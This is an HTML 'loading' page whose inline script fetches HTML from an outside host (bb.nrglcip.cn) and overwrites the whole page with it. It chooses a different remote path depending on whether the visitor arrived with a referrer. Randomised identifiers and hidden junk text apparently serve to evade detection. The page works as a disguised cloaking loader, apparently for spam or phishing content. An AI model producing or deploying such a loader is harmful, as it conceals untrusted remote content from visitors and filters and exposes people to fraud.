<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HBQXVj4l {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HBQXVj4l .w58xpFG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HBQXVj4l .content {
            line-height: 50px;
            text-align: center
        }

        .HBQXVj4l .img {
            width: 100%
        }

        .HBQXVj4l .lZYdis1g {
            text-align: center
        }

        .HBQXVj4l .lZYdis1g span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HBQXVj4l .lZYdis1g span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HBQXVj4l .lZYdis1g span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HBQXVj4l .lZYdis1g span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HBQXVj4l .lZYdis1g span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HBQXVj4l .lZYdis1g span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HBQXVj4l .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function cCKZ0gWNh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zkazrG2 = cCKZ0gWNh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zkazrG2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zkazrG2 +".html?a=share";
		}
		
        M37PcaLqJ=url+"#"+new Date().getTime();
        M37PcaLqJ && function() {
            $.get(M37PcaLqJ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >fcPXh620OPGcmIqNrEHFX3e52mFKBAiucuI286eVHtG6zK9eoGlXp78A24ZMYKkaSGxIwksVVjXXttU4xvt</h1>
<b style='display:none' >Bzx7JOjnftTiAlbiJh11xDiwX97EQnRytK7KyVN41lx3QJYbR5KQs8Vp6s</b>
<p  style='display:none'>zPLilx9w1IUO86A0RfuAXGMNtT8pakOAfVvyLYJI2ySrPCp4rbFHuGumD9wqqw2kl8uvvkoK94PyQx5Ogl6uzKEL4DNdsE</p>
<li style='display:none' >e4cn4OEl5dNe8ZFQEbXEiUA8W3MszVwK7YQbk6X3wKmxI28MWEeY5HJd3OvcZ81P75aiuDgx9QGcyY4ogF4HwTM</li>
<li style='display:none' >e4cn4OEl5dNe8ZFQEbXEiUA8W3MszVwK7YQbk6X3wKmxI28MWEeY5HJd3OvcZ81P75aiuDgx9QGcyY4ogF4HwTM</li>
<b style='display:none' >Bzx7JOjnftTiAlbiJh11xDiwX97EQnRytK7KyVN41lx3QJYbR5KQs8Vp6s</b>
<img  src='' style='display:none'>
<b style='display:none' >Bzx7JOjnftTiAlbiJh11xDiwX97EQnRytK7KyVN41lx3QJYbR5KQs8Vp6s</b>
<h1 style='display:none' >fcPXh620OPGcmIqNrEHFX3e52mFKBAiucuI286eVHtG6zK9eoGlXp78A24ZMYKkaSGxIwksVVjXXttU4xvt</h1><div class="HBQXVj4l">
    <div class="w58xpFG">
        <div class="lZYdis1g">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >gtY1mUmWpHocc4pzCdOWTXJJY</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >gtY1mUmWpHocc4pzCdOWTXJJY</h1>
<span style='display:none'>q35WSFVWOgDtR9mQ0MKShy7LSfszIftWIQjuLJtzezyUG6l3TBMfV0YuOlujf2KwJBRRT3J44t5sL</span></body>
</html>